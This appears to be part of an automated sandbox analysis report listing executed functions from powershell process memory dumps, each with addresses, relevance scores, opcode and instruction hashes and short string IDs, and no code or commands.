                                                                  • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                  • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Executed Functions

                                                                  Function 04C471E8 Relevance: .3, Instructions: 313COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9db48edc9d3837ec7b32227f01c35838f31667cda908cbbde336da1779d530d
                                                                  • Instruction ID: ae007106aa52ba5bdbb8965be4e0484d5410a9013e9d3042b85c31cd201dc8b9
                                                                  • Opcode Fuzzy Hash: e9db48edc9d3837ec7b32227f01c35838f31667cda908cbbde336da1779d530d
                                                                  • Instruction Fuzzy Hash: 4FC16C31A002088FDB14DFA9DA44AADBBB7FFC5314F158559E806AF365DB34AD49CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C429F0 Relevance: .2, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd8f03f39ea5f304000d5bd5ceeaba72abb9f539fca8f5ad4359275d803ff37a
                                                                  • Instruction ID: 19d7d79e120fd4175aaedfd67b911f6c8020eacbb9e46a918f3b87e94e20413a
                                                                  • Opcode Fuzzy Hash: cd8f03f39ea5f304000d5bd5ceeaba72abb9f539fca8f5ad4359275d803ff37a
                                                                  • Instruction Fuzzy Hash: 4691C1306002458FCB16CF58C595AAEFBB2FF89310B248699E855EB3A1C735FC81CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C479B0 Relevance: .2, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c71e15eb74cfb19dd589e9d000b384925c30e93b512b89a6e93ba5a0ac8f4ad
                                                                  • Instruction ID: dfd69bde0901c0c62d294293f672e61355b58a6c396c011490062615d3ef1d8b
                                                                  • Opcode Fuzzy Hash: 0c71e15eb74cfb19dd589e9d000b384925c30e93b512b89a6e93ba5a0ac8f4ad
                                                                  • Instruction Fuzzy Hash: 9771A230A01204CFCB18DF68C984A9DBBF6FF89314F14896AD416EB751DB71AD46CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C47B1E Relevance: .2, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4fecaac32f2ad717460cb654f06a1437d20bdf0d113d828a61f725a3368f4617
                                                                  • Instruction ID: c5088b35a28c106a365b6f7c84b9dbd00352912d397db5dce46b79fede2b72ae
                                                                  • Opcode Fuzzy Hash: 4fecaac32f2ad717460cb654f06a1437d20bdf0d113d828a61f725a3368f4617
                                                                  • Instruction Fuzzy Hash: D3714F70E012089FDB18DFA5D994AADBBF7FF88314F148429D416AB790DB34AD45CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C47741 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b37181e66aa19ee024094b83d99e2defad5aaa078e964bc5cea9dddc9455077b
                                                                  • Instruction ID: 508da0b532d21d9c164c9608b513a22af4d0ba1cda9c142a757a1ad0a298c8e8
                                                                  • Opcode Fuzzy Hash: b37181e66aa19ee024094b83d99e2defad5aaa078e964bc5cea9dddc9455077b
                                                                  • Instruction Fuzzy Hash: A3415C31A052048FD719EFA4C9586AD7BB7EFCD710F085468D446EB3A0CB34AC81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C4799B Relevance: .1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae06a2f7e178a470cc662bbaed146cc3a6cbfc07815bd282892cb3243a7bad28
                                                                  • Instruction ID: 5f0178f735ba4111c582f2f69d081ac96a0c13411760d2d73fce3b5b7ad09f07
                                                                  • Opcode Fuzzy Hash: ae06a2f7e178a470cc662bbaed146cc3a6cbfc07815bd282892cb3243a7bad28
                                                                  • Instruction Fuzzy Hash: 2D419130A002088FDB18DFA9C994AADBBF6FFC9350F14846DD005AB795DB74AD45CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00F3D01D Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1698772021.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_f3d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9cf54ef5df4acf51563a6131ccc668b31f5d099e817c7f78059227d1ed0f4e0
                                                                  • Instruction ID: 6a281303c97e4a1be3a6f93ff92acd204b7194fa0df72b78d09361a0e27c7333
                                                                  • Opcode Fuzzy Hash: d9cf54ef5df4acf51563a6131ccc668b31f5d099e817c7f78059227d1ed0f4e0
                                                                  • Instruction Fuzzy Hash: 41012BB29043409FE7144E21EC84B67BBD8EF81B34F18C019EC480B146C3799841DAB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00F3D005 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1698772021.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_f3d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c2594dfde6c082df636c274c77828fe8e862003ca515fb4c802a76a1539521d
                                                                  • Instruction ID: 5ab81dc514f7ec99d7d3668abe3b5753bc7755018cfcd43bbbc2453862eab981
                                                                  • Opcode Fuzzy Hash: 6c2594dfde6c082df636c274c77828fe8e862003ca515fb4c802a76a1539521d
                                                                  • Instruction Fuzzy Hash: A701696240E3C09FE7128B259C94B52BFB4DF43624F1980DBD8888F1A7C2699848CB72
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04C476D5 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c53e2980adea665eec0ae74256c50a603c0801dc9eb0bfdfa3212152ca16f95d
                                                                  • Instruction ID: 14b9eecbc216986744e085925a078b860669c04bb47b5dbaac2ce0b584e43dba
                                                                  • Opcode Fuzzy Hash: c53e2980adea665eec0ae74256c50a603c0801dc9eb0bfdfa3212152ca16f95d
                                                                  • Instruction Fuzzy Hash: DAF01C3070030A8FEB08DBA4C595BAE77B2ABC4704F148924E5029F255CB7CA9499F80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Executed Functions

                                                                  Function 075C9F60 Relevance: 9.4, Strings: 7, Instructions: 600COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84l$84l$84l$84l$84l$84l$_
                                                                  • API String ID: 0-1999844729
                                                                  • Opcode ID: db638a59f18502be0c6d8c61b78bb9a01c1c13542676fa7b442ccf0f0dded009
                                                                  • Instruction ID: 3e0efd9af09eb1a0287b376aad9d671c3d1ba88f92ff2e16ad94173f16a0d0ba
                                                                  • Opcode Fuzzy Hash: db638a59f18502be0c6d8c61b78bb9a01c1c13542676fa7b442ccf0f0dded009
                                                                  • Instruction Fuzzy Hash: 6F22B4B1B00219DFDB15DBA888117AABBF6FB89610F24C45EE905AB341DB32DD41C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C28D0 Relevance: 3.9, Strings: 2, Instructions: 1389COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl
                                                                  • API String ID: 0-1194790885
                                                                  • Opcode ID: 21f95be14c1f3267fe8ae9a94886f002d593bc56d4eecc9a16bf995a20f84e4a
                                                                  • Instruction ID: 021a7a2ba1480642c1f4727956fd4e1d638704b6d7396a5fa23bbd102eaad5bf
                                                                  • Opcode Fuzzy Hash: 21f95be14c1f3267fe8ae9a94886f002d593bc56d4eecc9a16bf995a20f84e4a
                                                                  • Instruction Fuzzy Hash: 14C27DB0B00209DFD714DB98C951BAAB7B2BF85714F24C06AD905AF751CB72DC81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C8C38 Relevance: 3.2, Strings: 2, Instructions: 665COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4l$4l
                                                                  • API String ID: 0-2351638723
                                                                  • Opcode ID: d4aa34a7f685c8e0641c1a4e5c9793c9bc84f40abf9b2107c2eacc100ad240fe
                                                                  • Instruction ID: e7ea27aad863c77dc6399d34f420eb371071bca410373dc577416ddff04d98d9
                                                                  • Opcode Fuzzy Hash: d4aa34a7f685c8e0641c1a4e5c9793c9bc84f40abf9b2107c2eacc100ad240fe
                                                                  • Instruction Fuzzy Hash: 3D529EB4A10214DFD724CB58C940BE9B7B2BF88704F24849AD9096F751CBB6ED82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C4280 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl
                                                                  • API String ID: 0-1194790885
                                                                  • Opcode ID: 4a08a874a72691cbe297b07f7b3fdfe1748474336b2076196ebdac8e7f345f4c
                                                                  • Instruction ID: 9dd8c692f5a7e43055141fc9193eb35545752eeb36f3cf23bf46b3b03304d63f
                                                                  • Opcode Fuzzy Hash: 4a08a874a72691cbe297b07f7b3fdfe1748474336b2076196ebdac8e7f345f4c
                                                                  • Instruction Fuzzy Hash: A6E19EB0A00245DFDB14DBA8C565FAEBBB2BF89704F20842AD9016F755CB75EC81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C3BD1 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl
                                                                  • API String ID: 0-423539152
                                                                  • Opcode ID: 611e054439d6af6834ce2f99d0310b9931200af6c29d8fca31ec92321c21848a
                                                                  • Instruction ID: 772667c6aa62bbfb3653e3bb9b6a280b2b7b2c24756a5f48400fcee375eba2cc
                                                                  • Opcode Fuzzy Hash: 611e054439d6af6834ce2f99d0310b9931200af6c29d8fca31ec92321c21848a
                                                                  • Instruction Fuzzy Hash: 4B124BB4A11209DFE714CB98C580FAABBB2BF84714F14C05AE9056F751C772EC81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C4262 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl
                                                                  • API String ID: 0-423539152
                                                                  • Opcode ID: 9087f9e78549c4728ec2cb1125ea6530f95145aa8a69a614140ddcd171a86d6b
                                                                  • Instruction ID: fd0530d52c0163b356e22112a34f90fcc0c4db9891d56a37742d08a9ee82745c
                                                                  • Opcode Fuzzy Hash: 9087f9e78549c4728ec2cb1125ea6530f95145aa8a69a614140ddcd171a86d6b
                                                                  • Instruction Fuzzy Hash: D4C1DCB4A002459FDB14CB98C561FEEBBB2BF89300F24C01AE9016F755CB71E882CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C9F45 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84l
                                                                  • API String ID: 0-1480273888
                                                                  • Opcode ID: cd081d135dad89d56bc4c910555fc6cd4f02e840754832a576e1521b13c3672f
                                                                  • Instruction ID: 3e586c5ee13cb0d2d507c204ff98ab5332fadb4ad63641c9ac28ce285c62c18e
                                                                  • Opcode Fuzzy Hash: cd081d135dad89d56bc4c910555fc6cd4f02e840754832a576e1521b13c3672f
                                                                  • Instruction Fuzzy Hash: B551AFB1A00209DFDB11CE98D941BE9BBF5BF45321F19C89EE804AB291D731EC45CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AE81D0 Relevance: .7, Instructions: 697COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f47a9dc49912aa00da5c68cb6727dfde9ab7fe9a8565f6578ec96baef0106c8f
                                                                  • Instruction ID: 173933069743b3a8e32d21abb3a12baee1fe7d7cf79245bff528a69ff343e3ff
                                                                  • Opcode Fuzzy Hash: f47a9dc49912aa00da5c68cb6727dfde9ab7fe9a8565f6578ec96baef0106c8f
                                                                  • Instruction Fuzzy Hash: EE522774A00219EFDB15DF99D884AADFBB2FF88310F248599E814AB351C735ED81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C33CD Relevance: .6, Instructions: 650COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7844b36921242a7af40fde0dbd82d849dea008f79b01e212c60702dc1679c45e
                                                                  • Instruction ID: 010df4894f0f3733c4f7c7329ce5b757f87e12f813189eef69800eea30b57e98
                                                                  • Opcode Fuzzy Hash: 7844b36921242a7af40fde0dbd82d849dea008f79b01e212c60702dc1679c45e
                                                                  • Instruction Fuzzy Hash: 4D425CB4B102089FD710CB98C951BA9B7B2BF85714F25C09AD905AF751DB72EC81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C8B18 Relevance: .6, Instructions: 572COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 033a493fc410d11a452b260348fa177636a7891ebb6615a3d62db06d9d6f96a0
                                                                  • Instruction ID: b2169c4e08869deb88cc2fa9d180a7e9f5a2b195d4e1fd1a47e190763162190f
                                                                  • Opcode Fuzzy Hash: 033a493fc410d11a452b260348fa177636a7891ebb6615a3d62db06d9d6f96a0
                                                                  • Instruction Fuzzy Hash: 97329FB4A10214DFD724DB58C941BE9B7B2BF89304F14849AE9096F751CBB2ED82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075CA810 Relevance: .6, Instructions: 560COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be65d76e5b2d0bb08be3416074dd5e0a2071c91d9836ba328d29b03938cf4fef
                                                                  • Instruction ID: 32c32be0cf19ef8aa569791b69b36c4c8a3dcfb68275c9e589e8069bf35eec92
                                                                  • Opcode Fuzzy Hash: be65d76e5b2d0bb08be3416074dd5e0a2071c91d9836ba328d29b03938cf4fef
                                                                  • Instruction Fuzzy Hash: 6B1204B0B0424A8FDB15DBA889417EABFB2FF85211F24C4AFD5459B252DB35CC81C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C0CC0 Relevance: .5, Instructions: 492COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eda22f5314c0a5cca6439382688835ccfe1c3e1454578e5f2acf882c9e67ba5
                                                                  • Instruction ID: 518e2dc23723f60d4b41917350dce65543dd133f042cf237004403d9d13465b6
                                                                  • Opcode Fuzzy Hash: 6eda22f5314c0a5cca6439382688835ccfe1c3e1454578e5f2acf882c9e67ba5
                                                                  • Instruction Fuzzy Hash: 3D125EF4B00209DFD714DB98C950BAAB7B2BF85614F24C06AD9099F756CB72DC82CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C83C3 Relevance: .5, Instructions: 482COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90244e19c942dfd7bb88ef075afe273e0c257aed2df9c92ae51175c7ae13bf8b
                                                                  • Instruction ID: dba68800d0842c1a4c330c7665fdeefca5a623fad8ff49b8fae255c34e273c8f
                                                                  • Opcode Fuzzy Hash: 90244e19c942dfd7bb88ef075afe273e0c257aed2df9c92ae51175c7ae13bf8b
                                                                  • Instruction Fuzzy Hash: 8612BEB4A102149FD724DB58C941BEAB7F2BF88304F148499D9096F791CBB6ED82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C349E Relevance: .4, Instructions: 439COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c538408d6158ce31421427fd460fefdbf2f8e7bed6047fa9d611bf77a8bcacb
                                                                  • Instruction ID: a5bca6db79afbe99016fbc692f6dcffa71b8ab670c99c6ae954a3373e6073c26
                                                                  • Opcode Fuzzy Hash: 0c538408d6158ce31421427fd460fefdbf2f8e7bed6047fa9d611bf77a8bcacb
                                                                  • Instruction Fuzzy Hash: DF025CB4B10208DFD710DB98C951BA9B7B2BF84714F24C05AE909AF351DB72EC81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AEA9E0 Relevance: .4, Instructions: 436COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b6c255e5718725e3d47ac6779659371ed5be8a618c11c8fe083c35d53bf56ea
                                                                  • Instruction ID: c12a92ea3f56c0eec68e38303b32a74da88309a681c97a1fba09f709ceebc9a0
                                                                  • Opcode Fuzzy Hash: 7b6c255e5718725e3d47ac6779659371ed5be8a618c11c8fe083c35d53bf56ea
                                                                  • Instruction Fuzzy Hash: 4C024A75A00219DFDB15DF99D884AAEBBF2FF88310F248559E815AB361C731ED81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C8BE8 Relevance: .4, Instructions: 429COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d34713b7187b6c5843fabe8a57315a0aca4181e2937af5f7797497e1134ade6
                                                                  • Instruction ID: ea6c5dc9beb3a83ce64a520b36308fbbdd22ae4da91badb5d0808d3787a53713
                                                                  • Opcode Fuzzy Hash: 5d34713b7187b6c5843fabe8a57315a0aca4181e2937af5f7797497e1134ade6
                                                                  • Instruction Fuzzy Hash: 43028FB4A10214DFD724DB58C941BE9B7B2BF88304F148499E9096F791CBB6ED82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AEAFA8 Relevance: .4, Instructions: 407COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9a859640b4b99a568482e4315c665b98bcce37824f8d5e009383391164e1545
                                                                  • Instruction ID: 2dfcf8ce355aa09a3830290573d25d59679ab346a4e8bc6ddadd456dcc7604b2
                                                                  • Opcode Fuzzy Hash: e9a859640b4b99a568482e4315c665b98bcce37824f8d5e009383391164e1545
                                                                  • Instruction Fuzzy Hash: A5023A74A012199FDB05CF99D884AEDBBB2FF88310F248159E815AB365C735FD81CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AE9FE0 Relevance: .4, Instructions: 404COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b55de8419753e6c699e730b8d11b21c74bbd722af6a171c1548397f64b3e1f8c
                                                                  • Instruction ID: 5bb073a2da41649e466ca4c31a112823499411ca119b928f0715508c595fee7a
                                                                  • Opcode Fuzzy Hash: b55de8419753e6c699e730b8d11b21c74bbd722af6a171c1548397f64b3e1f8c
                                                                  • Instruction Fuzzy Hash: 26025D74A01209DFDB05DFA9D884AADBBF2FF88310F258559E815AB361C735ED41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AEBAFE Relevance: .4, Instructions: 404COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1f960945ea061bfd1946383564aed55c46dea98d1128c403e41f91c704cc423
                                                                  • Instruction ID: 87fe6473f36f599f6c28ae0babb382e49e37ef1b9468891faa7205eaad5a8cb1
                                                                  • Opcode Fuzzy Hash: c1f960945ea061bfd1946383564aed55c46dea98d1128c403e41f91c704cc423
                                                                  • Instruction Fuzzy Hash: 17E11C74A00219EFDB05DF99D884AEDBBB2FF88310F248559E815AB355C735ED81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C1108 Relevance: .4, Instructions: 389COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6192593b82932ecdceac06afd30aae4cc65772c918c86eb21c7d3d87668ee0f3
